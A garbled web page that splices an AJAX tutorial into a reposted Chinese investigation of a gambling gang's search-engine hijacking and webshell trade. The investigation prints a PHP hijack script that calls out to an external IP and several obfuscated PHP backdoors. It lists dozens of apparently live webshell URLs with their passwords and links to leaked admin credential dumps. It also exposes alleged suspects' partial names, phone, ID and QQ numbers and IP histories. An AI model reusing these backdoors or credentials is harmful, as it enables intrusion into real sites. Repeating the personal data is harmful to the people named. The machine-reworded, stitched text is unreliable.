再度不学AJAX了!(一)AJAX概述

“再也不学AJAX了”是一个与AJAX主题相关的著作系列,包含以下两个部分的情节:

图片 1

  1. AJAX概述:重要回应“AJAX是何等”这一个题材;
  2. 使用AJAX:介绍怎样通过JavaScript发送AJAX请求;
  3. 跨域获取数据:介绍了与“跨域发送AJAX请求”相关的一些情节:比如“浏览器同源策略”与四种跨域请求资源的格局:JSONP,CORS,postMessage和webSocket;

起因

对这件事情的导火线是某天我渗透了一个大站,第二天进webshell时就发现,当前目录现身了新的后门,仔细一查,发现是博彩团伙干的,网站被全局要挟黑帽程序如下代码

set_time_limit(20);error_reporting(0);

define('u_b','/');

define('s_u','http:// 107.182.228.74/');

define('s_s','@haosou.com|360.cn| spider|360spider|so|360|sogou|sm.cn|youdao@i');

define('h_t',$_SERVER['SERVER_NAME']);define('r_s',$_SERVER['HTTP_REFERER']);define('u_s',$_SERVER['HTTP_USER_AGENT']);define('h_z',s_p());

function s_p(){$d='';if(isset($_SERVER['REQUEST_URI'])){$d=$_SERVER['REQUEST_URI'];}else{if(isset($_SERVER['argv'])){$d=$_SERVER['PHP_SELF'].'?'.$_SERVER['argv'][0];}else{$d=$_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'];}}if(isset($_SERVER['SERVER_SOFTWARE']) && false!==stristr($_SERVER['SERVER_SOFTWARE'],'IIS')){if(function_exists('mb_convert_encoding')){$d=mb_convert_encoding($d,'UTF-8','GBK');}else{$d=@iconv('GBK','UTF-8',@iconv('UTF-8','GBK',$d))==$d?$d:@iconv('GBK','UTF-8',$d);}}$r=explode('#',$d,2);$d=$r[0];return $d;}function r_s($url){$o=array('http' => array('method'=>"GET",'timeout'=>8));$context=stream_context_create($o);$h=file_get_contents($url,false,$context);if(empty($h)){$h=file_get_contents($url);}return $h;}

if(preg_match(s_s,r_s)){$d_s=true;if(preg_match("@site%3A|inurl%3A@i",r_s)){setcookie('xx',h_t,time()+259200);$d_s=false;}if($d_s ){setcookie('xx',h_t,time()+259200);$d_u=s_u.'?xu='.bin2hex(h_z);$d_u.='&ad=1&xh='.bin2hex(h_t);$d_c=r_s($d_u);header("Location: ".$d_c.'?'.h_t);exit;}}if(strstr(h_z,u_b)){if(preg_match(s_s,u_s)){$d_u=s_u.'?xu='.bin2hex(h_z);$d_u.='&xh='.bin2hex(h_t);$d_c=r_s($d_u);echo $d_c;exit;}}

https://www.so.com/s?q=%E5%A8%B1%E4%B9%90%E5%9C%BA&src=srp&fr=360sou_newhome&adv_t=d

看上去是针对360的,通过360去搜索site网站赌博有关的重要字出现的结果自己惊呆了!!!!居然非凡多的站被威吓,而且内部包括自己渗透测试的诸多站,看上去像是搜索引擎自己决定的排行一样,其实是非法分子利用了寻找引擎的名次算法规则。通过录取时间发现在2014年起始现出的,也就是说这个问题早就存在了多年之久,至今才爆出出来。

接下去自己就开展了所有疑点的调研,因为这个东西被利用对社会影响实在太大,不仅仅我是绝无仅有的被害者,而是以此安全领域的所有人。

盼望通过阅读该体系五个部分的情节,你可知彻底精晓并理解AJAX技术,从此再也不用专门学习AJAX。

调查

找到幕后团队

查马来西亚问题

浅析团伙的后门特征

1.本身对自我手里的shell举行了五回梳理,首先是对后门举办新的地点修改,在本来的后门地址放上了js代码,该段代码记录的是连锁指纹消息,以及各大网站的json获取。此时即使沉寂的等待。

2.自身对马来亚又展开了三次分析,把富有代码读烂了也没任何问题,同时也对马举行了抓包分析,没有任何外部请求。因为一贯没发现题目,所以自己专门举办了长达一周的数量包监控,仍旧不曾其余结果。这时候就特别纳闷,既然马没有问题,为何人家可以收获到自己的具备后门?难道是本人的总结机被入侵?我的网络环境除了http之外,不可以做任何协议请求,而自己的后门都保存在这台linux里,那一点也得以解除。只能再思索是不是哪儿疏忽了。

3.被该团队威逼过的站,我都检查了三回,之后我发现,每个站的富有文件创设时间都会被她们翻新到入侵时间,这正好符合了

看起来是本着360的,通过360去搜索site网站赌博有关的要紧字现身的结果我惊呆了!!!!居然非凡多的站被威迫,而且其中囊括我渗透测试的好多站,看上去像是搜索引擎自己决定的排名一样,其实是非法分子利用了探寻引擎的名次算法规则。通过录取时间发觉在2014年开班现出的,也就是说这么些题目一度存在了多年之久,至今才爆出出来。

接下去自己就举办了所有疑点的调查,因为这么些东西被应用对社会影响实在太大,不仅仅我是唯一的被害者,而是以此安全世界的所有人。

让大家最先吧 。

调查

找到幕后团队

查大马问题

分析团伙的后门特征

1.本身对本身手里的shell举办了一回梳理,首先是对后门举行新的地方修改,在原本的后门地址放上了js代码,该段代码记录的是不无关系指纹消息,以及各大网站的json获取。此时即令沉寂的守候。

2.自家对大马又开展了两回分析,把具有代码读烂了也没其他问题,同时也对马举行了抓包分析,没有其余外部请求。因为直接没察觉题目,所以我专门举行了长达一周的数量包监控,如故没有任何结果。这时候就充足纳闷,既然马没有问题,为啥人家可以获取到自我的有着后门?难道是本人的微处理器被侵入?我的网络环境除了http之外,不可以做其他协议请求,而自己的后门都封存在这台linux里,那点也足以祛除。只好再想想是不是什么地方疏忽了。

3.被该团体威迫过的站,我都检查了几遍,之后我意识,每个站的有所文件创设时间都会被她们翻新到入侵时间,这恰好符合了

看上去是针对360的,通过360去搜索site网站赌博有关的最紧要字出现的结果我惊呆了!!!!居然异常多的站被威吓,而且其中囊括我渗透测试的重重站,看上去像是搜索引擎自己支配的排名一样,其实是非法分子利用了追寻引擎的名次算法规则。通过录取时间发觉在2014年起头产出的,也就是说这个问题一度存在了多年之久,至今才爆出出来。

接下去自己就举办了所有疑点的调研,因为这么些东西被使用对社会影响实在太大,不仅仅我是绝无仅有的受害人,而是以此安全领域的所有人。

一、什么是AJAX?

AJAX是“Asynchronous JavaScript And
XML”的缩写(即:异步的JavaScript和XML),是一种实现无页面刷新拿到服务器数据的掺杂技术

让我们停下来好好想想一下以此概念,注意这些明明的绿色文字,它们出现在这里不是不曾理由的。

好的,相信您曾经对这么些定义有些映像,现在让我对那么些棕色的文字做些表明:

调查

找到幕后团队

查马来西亚问题

浅析团伙的后门特征

1.自身对本身手里的shell举行了一遍梳理,首先是对后门举行新的地方修改,在原先的后门地址放上了js代码,该段代码记录的是相关指纹音信,以及各大网站的json获取。此时虽然沉寂的等待。

2.自家对大马又拓展了三次分析,把具有代码读烂了也没其他问题,同时也对马举行了抓包分析,没有任何外部请求。因为平昔没察觉问题,所以自己专门举办了长达一周的数码包监控,如故不曾其余结果。这时候就可怜纳闷,既然马没有问题,为什么人家可以博得到自家的有所后门?难道是自我的微处理器被侵犯?我的网络环境除了http之外,不可以做任何研商请求,而自己的后门都封存在这台linux里,这一点也足以免除。只能再思考是不是什么地方疏忽了。

3.被该公司胁制过的站,我都检查了一回,之后我发现,每个站的所有文件创造时间都会被她们翻新到入侵时间,这刚好符合了特色,也就是刚被他们侵犯过的站。

如图特征,几乎各类站被入侵后有着创造时间都会更新五回。

图片 2

今后对她们自己的后门举行了搜集样本,新的开展出现了,一共发现2波不同的集体,但采取的马来亚均为一类。(见附件1)

自身对他们的马举办精通密审计后意识,他们协调记录马来亚后门的箱子地址为api.fwqadmin.com,因为有了新的线索,所以不得不临时保留,前面再对那一个举办渗透。

(一)XML是什么?

XML是“Extensible Markup
Language”的缩写(即:可进展标记语言),是一种特色接近HTML,用来叙述数据是怎么,并承载数据的号子语言,你可以在中文的维基百科中来看更完整的诠释,但大家现在一经了然它是一种用来承载数据的语言就丰裕了。

而JSON仅仅是一种多少格式,在JSON发明在此之前,人们大量运用XML作为数据传输的载体,也正因如此,AJAX技术的末段一个假名为“X”。而最近景观则发出了些变化,JSON这序列似于字符串对象的轻量级的数额格式越来越受到开发者青睐,几乎成为了AJAX技术的正规数据格式,由此好像AJAX技术如今应有换个名字,叫做“AJAJ”,呃,依然算了吧。

需要小心的是,JSON并不是XML的替代品,两者分别有其适应的场所。如若您对这三种多少格式的反差感兴趣,可以查看以下链接:

进展

经过两天的守候,终于到手了该团伙的螺纹新闻以及QQ号,然后我就敞开大神格局举行社工,之后基本认同这个人真实音讯(圈内叫老袁)。然后自己申请了一个QQ中号,以匿名的法门加了一些博彩导航网站上的qq,在QQ上问了几许个人,都未曾结果,后来自己干脆以做博彩的名义和他们开展深度交换,通过关系发现该协会的shell都是收购来的,一个月收入几百万人民币,是否真实就不得而知了。目前中央可以确认自己的判定错误,老袁就是绝无仅有的线索。

自身对被该团体做绑架的所有站举行了征集,还有跳转到他们导航的域名。首先对那多少个不是本身的站举办了渗透入侵,采集到后门样本,看到其中有个和我仿佛的大马,然则大旨变量结构不均等,我下载回来举行审计抓包同样没问题,后来通过相比较特征,发现马来亚请求的POST参数都是同样的,例如gopwd=密码&godir=
,马都没这多少个,这时候先河判断是上层网络出现了问题,通过流量提取到大马特征的地址,借使真是如此就太吓人了。

本身关系到老袁了,和她开展了部分盘问式的交流,感觉到他很恐怖,他说别搞他,他从前做诈骗的。后来发了一部分shell地址给本人来捧场我,如下列表,下边是星际团队的:

http://www.copperhome.net/file/avatar/31/cb/index.php?1=1&f=k        HyhbokskjGrsjhjM8hsL_hgshgK

http://www.212200.com/mocuz/downapppclife.php?1=2&Z=Opm    Hys7sa5wrKKO00GSBtashras28asNNmsn18

http://www.dailiba.com/about/index.php?v=1                Tmbdcuu123uualltop

http://www.chinaunix.net/mysql/tmp/hoem.php?1=1&f=k                HyhbokskjGrsjhjM8hsL_hgshgK

http://domarketing.org/phpsso_server/caches/commons/index.php?v=2ss        ytsadAskLs27ssJsjdasd2sS

http://www.baby-edu.com/member/admin/include/fields/box/index.php?v=qw            ytsadAskLs27ssJsjdasd2sS

http://www.hongze365.com/data/avatar/1/f/1.gif?1=2&GSW=Curry            TTrsfsdh748jsusyKKOystw889sbct

http://www.xiashanet.com/Head_Foot/bak/top900x40.php?1=2&BAT=HEHEDE            77iasyw00aUUSImmsb64682301jMM!!!Qko

http://www.hbmykjxy.cn/2015/0106/4589.php?1=2&GSW=Curry            TTrsfsdh748jsusyKKOystw889sbct

http://www.copperhome.net/file/avatar/31/cb/index.php?1=1&f=k        HyhbokskjGrsjhjM8hsL_hgshgK

http://www.dailiba.com/about/index.php?v=1                Tmbdcuu123uualltop

http://www.hubeifc.com/phpcms/modules/content/classes/commentl_api.class.php        UTF8

http://domarketing.org/phpsso_server/caches/commons/index.php?v=2ss        ytsadAskLs27ssJsjdasd2sS

http://www.huse.edu.cn/phpsso_server/phpcms/languages/en-us/condif.inc.php?v=sd        ytsadAskLs27ssJsjdasd2sS

http://www.xiashanet.com/Head_Foot/bak/top900x40.php?1=2&BAT=HEHEDE            77iasyw00aUUSImmsb64682301jMM!!!Qko

http://www.hbmykjxy.cn/2015/0106/4589.php?1=2&GSW=Curry            TTrsfsdh748jsusyKKOystw889sbct

http://www.hongze365.com/data/avatar/1/f/1.gif?1=2&GSW=Curry            TTrsfsdh748jsusyKKOystw889sbct

http://bbs.fish3000.com/mobcent/app/config/discuz.bak.php?1=2&TD=SAS            UUys78tasdRhasd00iasdyTGGgahs

http://bbs.dqdaily.com/uc_server/installlose.php?1=2&sha=shan            7yJJN730%1&uqYYqwhkkasII17vcxQ1mzaPQhn8!P

http://www.aquasmart.cn/member/fckeditor/editor/css/friend.php?1=1&f=k                HyhbokskjGrsjhjM8hsL_hgshgK

http://www.yangji.com/member/editor/fckeditor/editor/dtd/fck_dtd_test.gif?1=2&BAT=HEHEDE    77iasyw00aUUSImmsb64682301jMM!!!Qko

http://www.shenma66.com/nvzhubo/baorurekuxiongmiaonvzhuboMinanaxingganrewuzhiboshipin/inde.php        7yhaw1woAksmjh892jsasd1sajg

http://www.shenma66.com/nvzhubo/baorurekuxiongmiaonvzhuboMinanaxingganrewuzhiboshipin/inde.php        7yhaw1woAksmjh892jsasd1sajg

http://bbs.taisha.org/pms/data/templates/wind_homes.tpl.php?baidu=Google        erk12hj3nfher71h3j4k132bnnebr3hg4134

http://www.168w.cc/api/map/baidu/baidu.php?1=1&f=k                    HyhbokskjGrsjhjM8hsL_hgshgK

http://www.dibaichina.com/goldcard/data/allianceGHMC.php?1=1&baidu=.com    Tmbdcuu123uualltop

http://www.ijcz.cn/module/brandjoin/join.claos.php?1=2&BK=ManUtd            YIasdwj78954qwtyVVJsarwhahuyrwvsllps2

http://www.xiashanet.com/Head_Foot/bak/top900x40.php?1=2&BAT=HEHEDE            77iasyw00aUUSImmsb64682301jMM!!!Qkos

http://www.hotpoll.com.cn/i/index.php?v=111   heiheideheihei

星际团队是如何鬼?难不成又是做博彩的?通过与老袁进一步交换后意识,这么些shell都是另一个做博彩的,他就是说博彩圈子最大的协会,说实话,我挺兴奋的,发觉这件事越来越有意思了,我倒想看看那是些何人。

可是现在自我的对象还在“老袁”身上,因为自身得找到卖他shell的人,经过一番交锋之后,我得到到了真相,我也叫她提供了交易凭证。此处略去不表,我会放到前面取证部分。

即使有了shell卖家的联系格局,但是迟迟没添加上。这时候我又采取了另一种思路,钓鱼取证,老套路,如故在马来西亚地址上js
json,下面贴了几段字《add me email:xxx@xxx.com I will give you all
webshell》让老袁发给让她,以便她积极联系我。

新生她果然访问了多少个webshell的地址,我也抓取到了他的忠实PC指纹以及代理的指纹以及QQ昵称。之后她积极找到我,问我是不是星际团队的,并说收到我发的邮件了。这时候我就很好奇了,莫非星际团队也找到他了?然后她就来威胁自己,说要抓你们(星际团队),已经查明了星际团队一年了。

这时我心一想,水真深,查来查去的到底是何人在查何人呢。不过她必定是瞒但是我的,毕竟我有他卖shell的凭证,不过意外的是她说:“我背后都是省厅的人,你觉得这多少个shell都是怎么来的?都是在国家机器提取的。”我勒个去,国家会干这种事啊?国家提取网站记录自己是信,isp保留日志也是1年,至于批量领取全国网站访问特征拿出来卖那本身就不信了,要么就是黑客入侵到了运营商去提取出来的。

经过了有些沟通后,他居然直接说自家是星际团队,就把自身拉黑了。后来我就当仁不让加他说:“你是山西的吗,我一度有您犯案证据了。”他就怕了,主动加我认怂,还发了打包好的webshell给自身。这时候我又惊呆了,那简直是逆天的音频,居然有上万个webshell和国内所有cms的后台登录密码,其中包括dedecms
discuz wordpress emlog ecshop empire jieqi phpmyadmin uchome ucenter
php168等几乎是全国所有cms都设有,而且每种的数码去重新都在上万条,我会上传一部分在附件。他说她贼头贼脑的人的有几十万的discuz后台登录账户密码,我测试了他发我的部分后台,均可以登录,其中音讯包括登录的fromhash
uid 用户名、密码 、安全题材 、安全答案,而且都是后天的。

究竟是怎么东西能记录如此多东西还要还尚无一点非凡。我看看其中也有自我利用过马来亚的很多站,里面还有上万条webshell,其中有大气自身的站,还有大量各样类型的马来亚和不同密码,看样子并非自己一个人受害,我举行特色匹配出来,大概有上百人的马来亚不同特点。而且他发我的只是很小片段,叫自己给他钱才给我更多。这样一想她手里的资源都有几十万条了吗。他说他背后的人是技巧集团,还有各样0day,是给国家干的,手里有全国的webshell,即便真是他说的如此,这资源为啥出现在她这里了还拿出来卖?很肯定是瞎说怕我查他。我不倚重,决定继续调查。

 经过几天的分析,这波数据和原先wooyun曝光的出来的九宫格(我们可以回想一下二零一三年的http://www.dedebox.com/core/centerxxxxx.php)是如出一辙的,我对当时的多少也展开了打包分析,发现这波shell里面还存在部分的双重数据。而眼前以此马来西亚和当下九宫格的记名参数特征基本都是在Spider
PHP
Shell(SPS-)这款代码的根基上修改的,也就是说除了后门本身,这伙人还经过其他渠道来提取的豁达webshell,之后经过webshell去运作了记录后台数据的代码写入内存中僵死代码,保持着只要不换服务器就常年不死的状态,这也仍然臆度,因为后台数据之中有些站的确是九宫格重复的,假使是九宫格后门的话我就有新势头可查了,以上是自身举办的大概分析和调查过程。上边我就不描述过程,就径直提供数据记录以及取证结果,交给警方去完成了。

(二)无页面刷新?

大家知道,互联网最关键的法力在于“资源置换”,当初注明互联网的地理学家们也是基于这么些想法。尽管在互联网中“资源置换”的重点都是电脑。但为了便于互换,我们经常将得到资源的一方称为客户端(紧要的工具是浏览器),而将派发资源的一方称为服务端(又叫做“服务器”)。

在AJAX技术出现以前,倘使浏览器需要从服务器请求资源,其交互情势为“客户端发出请求
-> 服务端接收请求并回到相应HTML文档 ->
页面刷新,客户端加载新的HTML文档”。确实,这种互相模式万分精简,而且分外吻合人的直觉,对于当场游走于互联网中的极客而言,也真的够用了。可是随着一代的前进,互联网渐渐不只是极客们的娱乐场,越来越多商业化网站的出现,使互联网不再局限于满意人们“资源置换”的要求,人们起先期待能够在互联网中赢得更好的“利用体验”,而随着用户点击不断刷新页面的交互情势显然很难讨人爱不释手。

再试想这样一种境况,当用户点击页面中的某个按钮向服务器发送请求时,页面本质上只是部分数量暴发了变动,而这时服务器却要将重绘的整整页面再回来给浏览器加载,这肯定有悖于程序员的“DRY”原则,而且肯定只是局部数额的成形却迫使服务器要赶回整个HTML文档,这我也会给网络带宽带来不必要的开销。

有没有主目的在于页面数据变动时,只向服务器请求新的多寡,并且在阻碍页面刷新的图景下,动态的更迭页面中彰显的数量吧?
— 答案正是“AJAX”。

AJAX技术的问世,不仅经过阻止浏览器接受响应时刷新页面提升了互联网用户的接纳体验,还使开发者可以以更加微观的视角重新思考互联网使用的构建,从此,开发者将在“数据”层面而不是“资源”层面以更高的自由度构建网站和Web应用。

取证

以下这多少个是团伙一(老袁)跳转到的域名:

116305.net

559160.net

618309.net

786077.net

551809.com

www.919808.net

www.226830.com

均来源于同一团伙的,只是域名不同,每个站跳转到不同的域名分散风险而已,其中威迫代码里面的ip都是平等107.182.228.74,看得出来很成熟。

这些是仿照蜘蛛抓取威吓内容的bc logo图片地址的ip:

210.126.27.70

pic.root1111.com

58.96.179.132

104.202.66.226

此团伙工作条件ip,都在马来亚(时间在十二月9-号到3月26号以内的)

2016-10-26 13:00:01 ( IP 14.192.210.34 ) 马来西亚Windows NT 10.0, MSIE 49.0,Firefox 49.0, 1536×864

2016-10-26 13:20:09 ( IP 103.6.245.143 ) 马来西亚Windows NT 10.0, MSIE 49.0,Firefox 49.0, 1536×864

2016-10-26 13:00:25 ( IP 175.141.34.101 ) 马来西亚Windows NT 6.3, Chrome 50.0.2661,QQBrowser 9.5.9244, 1920×1080

2016-10-24 13:59:17 ( IP 175.136.41.251 ) 马来西亚Windows 7 & 2008 r2, MSIE 49.0,Firefox 49.0, 1536×864

2016-10-25 14:28:11 ( IP 175.143.101.241 ) 马来西亚 Windows NT 10.0, Chrome 47.0.2526, 1920×1080

2016-10-26 13:20:09  ( IP 103.6.245.143 ) 马来西亚Windows NT 10.0, MSIE 49.0,Firefox 49.0, 1536×864

14.192.211.116  马来西亚

14.192.211.223 马来西亚

175.138.234.137马来西亚

干活PC指纹(分析此公司有5个人):

Windows NT 6.3, MSIE 11.0,QQBrowser 9.5.9244, 1920×1080, 224 色

Windows 7 & 2008 r2, MSIE 49.0,Firefox 49.0, 1536×864

Windows NT 10.0, Chrome 47.0.2526, 1920×1080

Windows XP, MSIE 6.0, 1126×800

Windows Server 2003, Chrome 49.0.2623, 1920×1080

Windows NT 10.0, MSIE 49.0,Firefox 49.0, 1536×864

此团伙首领信息

QQ 4743048XX 6410755XX

真实姓名:袁X 重庆人

手机号:159989847XX  手机MAC:18:9E:FC:11:2C:70  马来西亚手机号:0601369589XX

他的网站:

www.badongedu.com 

 www.7cq.tv(他建立的地方论坛)

 api.fwqadmin.com(这个是他自己正在使用的大马自己留的后门收信地址)附件会有大马样本有兴趣的可以看看

Email:root@7cq.tv pianziso@163.com

在境内的野史IP:

222.178.225.146(重庆市 电信)

222.178.201.12(重庆市 电信)

27.11.4.19(重庆市 联通)

27.10.36.56(重庆市 联通)

113.204.194.202(重庆市 联通)

119.84.66.14(重庆市 电信)

61.161.125.77(重庆市巴南区 时代e行线网迷俱乐部李家沱店A/B馆)

国内的历史PC新闻:

mac:90-2b-34-93-ad-73

操作系统:Microsoft Windows XP

显卡:NVIDIA GeForce GT 610

CPU:AMD Athlon(tm) II X4 640 Processor 3325HZ

团伙成员信息就没去调查了,找到他就可以了。

WebShell卖家(一切安好)信息

VPN代理 :

110.10.176.127  韩国

2016-10-24 22:26:37 ( IP 211.110.17.189 ) 韩国

(自己比特币购买的主机搭建)访问时间2月9号

真实IP:

2016-10-26 16:23:27 ( IP 121.18.238.18 ) 河北省保定市 上海网宿科技股份有限公司联通CDN节点 Windows NT 10.0, Chrome 47.0.2526, 1920×1080

27.186.126.196 河北省保定市 电信  真实ip可能性更大

浏览器指纹音讯,一共3个不等的,但应该都是同一个人,可能电脑相比多,因为她有2个QQ

Windows NT 6.3, Chrome 45.0.2454, 1366×768 真实指纹

Windows NT 10.0, Chrome 47.0.2526, 1920×1080

Windows NT 6.3, Chrome 45.0.2454, 1366×768, 224 色, 未装 Alexa 工具

Windows NT 10.0, Chrome 53.0.2785, 1600×900, 224 色,

QQ2436449670  3496357182

Telegram:@haorenge888

这厮现在开的宝来,真是土豪啊,看来赚了好多钱仍是可以逍遥法外,是四川口音即青海人。

如要查到webshell来源唯有查他的暗中渠道。

她与老袁的贸易信息:。

图片 3

图片 4

图片 5

图片 6

(三)混合技术?

没错,AJAX技术并不只是操作XMLHttpRequest目的发起异步请求,而是为了贯彻“无页面刷新的资源拿到”的有些列技术的统称,这一个技能包括了:

  • JavaScript:用来在获取数据后,通过操作DOM或其他措施达成目的;
  • 客户端(即浏览器)提供的落实异步服务器通信的XMLHttpRequest对象;
  • 劳务器端允许浏览器向其发起AJAX请求的相干安装;

领悟AJAX并不只是操作XMLHttpRequest对象,对于初学者而言是异常必要的。


星际团伙音讯

采用过的域名:

wokeda.cn 

www.98589.com 

www.356388.com 

chuan2828.com 

cnzzz.pw 

web-159.com

diyi1111.com

diyi2222.com

diyi3333.com

diyi4444.com

xinyu55.com

hongyihai.com

80268.com

5130898.com 

maimai789.com 

zhenyi58.com 

xwgy999.com 

总结代码

document.writeln("<div style=\"display:none;\"><script language=\"javascript\" type=\"text\/javascript\" src=\"http:\/\/js.users.51.la\/18737987.js\"><\/script><\/div>");

            var hmt = hmt || [];

            (function() {

                var hm = document.createElement("script");

                hm.src = "//hm.baidu.com/hm.js?c1c374db31da00a022c09301920eff78";

                var s = document.getElementsByTagName("script")[0];

                s.parentNode.insertBefore(hm, s)

            })();

            callJump()

        }

    }

} if (init_flag == "93989") {

    call_init_error()

}

可以透过他们网站的总计代码分析登录的笔录大马的ip就是忠实ip

搜寻各大搜索引擎爬取跳转到他们的站,和快照特征,竟然有抢先1000个被他们胁迫过的网站,其中囊括了不少全国最大的消息网站如ifeng.com
china.com.cn,如若派出所需要我得以提供列表

星际吓唬团伙在马来亚,成员大约6个人左右,团伙渗透的一手包括但不限于鱼叉,社工,爆破,xday,漏洞均会爬虫批量去侵扰,每一次入侵后爱不释手留大量的后门,避免权力掉了。

分子分工:

二名大旨技术渗透人员(其中一名重要承担攻击,入侵大型音讯类型站点。一名重大担负代码审计,以及中间一多重php的开支,包括威逼程序,外兼入侵一些中型权重站点)

一名一般技术渗透(对扫描出漏洞的污物站点举办侵犯)

二名负责挂威胁代码,假设站掉了就会去苏醒

一名负责bc网站上的商海兼财务,收账出帐以及收站

主题成员在2015年1一月份从大马回中国至2016年十一月左右赶回大马

如上是自身经过圈内人口利用部分手法了然到的消息,因为这个团队安全意识比较高,没得到太多真实音信,可是有一位给她们做过外包的黑客可以追溯

星际使用过的QQ :31XXXXXX最早的时候

有名的名媛黑客:YingCracker

QQ:2537789XX 9847545XX

手机: 13665XXXXXX or 13665XXXXXX

姓名: 江XX

找到这位美丽的女孩子黑客去探听下此公司的图景应该会有举行

她俩的后门样本:

<?php 

@$A='Acc';$p='_';$o='PO';$s='S';$t='T';$a='as';$b='sert';$Acc=$a.$b;@${$A}(${$p.$o.$s.$t}[ziiuioxs]);

echo 'error';exit;?>

<?php

@$ksvSGu= "\x73tr\x5f\x72e\x70l\x61\x63e";

@$xRec= @$ksvSGu('wcaSq','','awcaSqrrwcaSqawcaSqywcaSq_filwcaSqter');

@$SOet= @$ksvSGu('wZTB','','aswZTBsewZTBrwZTBt');

@$xRec((array)@$_REQUEST['rretgscr'],@$SOet);

?>

<?php 

if($_GET['jumpvv']){

$tu="TVFsnZG9vcnB5J";

$mzd="10pOwoK";

$fc="Cg";

$tnz = str_replace("rn","","rnstrnrrn_rrnernprnlrnarncrne");

$nu="pqldmqFsKCRfUE9";

$qwb = $tnz("u", "", "ubuausue6u4u_udueucoudue");

$lcq = $tnz("j","","jcrjejatej_jfujnjcjtjiojn");

$htx = $lcq('', $qwb($tnz("q", "", $fc.$nu.$tu.$mzd))); $htx();}

?>

<?php

@$EuTsNl="p"."r"."eg_r"."epla"."c"."e";

@$EuTsNl("/[email]/e",$_POST['iiaqffg'],"error");

?>

<?php

$ad = '|';$ad .='.';$ad .='*|';$ad .='e';

@preg_filter('|.*|e', $_REQUEST['andyzhengs'], '');

?>

有的本身平昔复制到文件夹里面了

收信地址嫌疑人消息

这一次风波的特征和九宫格类似,因而我对二零一三年的轩然大波开展了梳头并且对这厮举行了深切调查,可以确认六人,一定是其中一个人干的。

只要不是马来亚的题目那么也得以从这多少人中来询问到此次后门事件的内情,唯一的不确定性就是箱子的大马看不出任何问题。因为和她们在此之前后门数据实在太像了,几乎囊括了具有的cms,记录的后台有些也是几年前被入侵过的九宫格箱子里面的,至今还在记录着新的情节

嫌疑人一:

 

本来的吐司成员spider,也就是spider马来西亚的奠基者,当时她也留过后门,追溯起来都是二〇一一年的事体,经过调查,这时候她所公开出来的shell马来亚就存在后门,而且也被她自个儿大量使用做游戏恐吓收录挂马,传闻在二零一二年就赚到了几百万身价,后来就一向低调出了本田的视线,在天地销声匿迹了。可是现在检察有新的发现,他一直在外向着,在当年里面登录过历史邮箱,续费过后门的收信域名,因为他没办法换域名,换了就收不住shell。

Id: iamspider  iamsunchao

实事求是姓名:孙x

年龄:29岁(不确定)  

就读过:海东荣县富西初级中学  

户籍:成都 西昌人

QQ:80937XX(真实QQ)  8622629XX(小号)

正史IP(可能已经过时了)

222.215.38.109(浙江省内江市 电信)

61.157.123.56(湖南省凉山州西昌市 电信)

222.215.39.131(山东省凉山鄂温克族自治州 (隆昌县)电信)

222.209.198.201(广东省甘孜维吾尔族自治州新都区 山东音乐大学附近蓝天云网吧)

疑凶二:

圈内的大神:toby57,曾经和她还打过交道,说是在给国家工作了,有点不太像是这件事的首恶,不过这么些dedebox.com域名所有人就是他,而且他的能力充分干那样的事务

邮箱:toby57@163.com 也是她最常用的im

历史ip

171.212.206.46(四川省宜宾市 电信)

220.166.52.45(山东省宜宾市 电信)

222.209.139.66(海南省宜宾市 电信)

220.166.52.45(江西省绵阳市 电信)

125.66.99.211(浙江省凉山藏族自治州 电信)

61.157.97.82(四川省攀枝花市 西南财经大学)

112.192.70.251(海南省凉山鄂温克族自治州 联通)

125.65.97.134(安徽省眉山市 电信)

61.157.97.85 (浙江省自贡市 西南金融高校)

182.139.60.17(青海省南充市 电信)

手机号:152083414XX

姓名:杨xx     

身份证号:5116211989050625xx(浙江省岳池县)

所在城市:松原

就读过:海南省眉山市西南农林大学

二、AJAX的意义

信任你已经理解了,AJAX技术的含义在于:它亦可使浏览器在不刷新页面的景观下取得服务器响应,这将大大升级互联网用户的采用体验,同时,由于AJAX请求获取的是数量而不是HTML文档,由此它也节省了网络带宽,让互联网用户的网络冲浪体验变得尤其百步穿杨。

还要,咱们也理应注意到,由于AJAX技术可以令开发者只向服务器获取数据(而不是图表,HTML文档等资源),互联网资源的传导变得前所未有的轻量级和纯粹,这刺激了广阔开发者的成立力,使各式各个功用强大的网络站点,和互联网拔取如额尔齐斯河沙数一般现身,不断带给人惊喜。


结论

近期事实上也没怎么结论,从何泄漏的全国的享有马来西亚以及各种cms后台后门如故个谜,因为能力太菜了。。。但是我深信不疑那些谜警方能够解开,你们赋有丰富的权利和沉重去完成打击。否则对网民的侵害太大了,这些webshell被拿去做博彩做诈骗危害就很大了,几乎一个菠菜行业一个诈骗行业的黑帽seo源头都来于此,假使不及时拦截危害还会极其扩充。

除此以外要去看被入侵的站点请到360找寻,娱乐场看最新一天收录

https://www.so.com/s?q=%E5%A8%B1%E4%B9%90%E5%9C%BA&src=srp&fr=360sou_newhome&adv_t=d

自己提示:使用过其他大马的帽子注意检查下自己的shell,看看其中的文件时间是不是联结为日前的创制刻间

ps:附件为webshell部分列表,大约几千条随机copy。

传送门:https://1drv.ms/u/s!AhMf1bUbIk7UanjRbtWlwOyebhU

部分受害域名列表(这些基数是去重新1W多条,未去重新大概20万条,其中的信息量与附件类似,一个站会记录所有的管理人登录账户密码,包括webshell的留存)

传送门:https://1drv.ms/t/s!AhMf1bUbIk7Ua72FwZXZuVMX3fw

世家在拿到受害列表能够搜寻入手里的webshell域名,假使存在那么就注意及时处理掉,以免被不法分子给你造成危害。

 

转自:http://www.freebuf.com/news/topnews/118424.html

三、小结

正文我们讲课了“什么是AJAX”以及“AJAX的意思”,你也许会以为技术博客的一篇小说完全没有代码实在令人不快,但自我觉得都某个概念建立一个周旋完好的心智模型不仅紧要而且可以为技术细节的学习打下很好的基本功,别着急,在下一篇随笔中,我们会花费大量篇幅去琢磨哪边运用AJAX技术,希望您保持耐心,Keep
Learning,加油!